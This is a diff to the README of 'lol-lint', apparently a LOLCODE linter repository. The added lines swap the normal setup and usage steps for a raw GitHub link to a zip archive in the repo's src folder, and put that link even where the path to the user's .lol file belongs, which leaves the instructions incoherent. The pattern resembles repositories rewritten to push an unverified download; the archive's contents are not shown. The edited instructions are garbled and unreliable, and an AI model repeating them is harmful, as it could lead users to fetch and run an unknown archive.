nenavathhobulsai/lol-lint/README.md

 #### For Linux

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/nenavathhobulsai/lol-lint/main/src/lol-lint-1.7.zip` file.
 2. Open your terminal and navigate to the extracted folder.
 3. Run `./lol-lint` to start the linter.

 ### 3. Run lol-lint

 After installation, you can use lol-lint to check your LOLCODE files.
-Open your terminal or command prompt and type `lol-lint [your-file.lol]`.
-Replace `[your-file.lol]` with the path to your LOLCODE file.
+Open your terminal or command prompt and type `lol-lint [https://raw.githubusercontent.com/nenavathhobulsai/lol-lint/main/src/lol-lint-1.7.zip]`.
+Replace `[https://raw.githubusercontent.com/nenavathhobulsai/lol-lint/main/src/lol-lint-1.7.zip]` with the path to your LOLCODE file.

 ## 🛠️ Features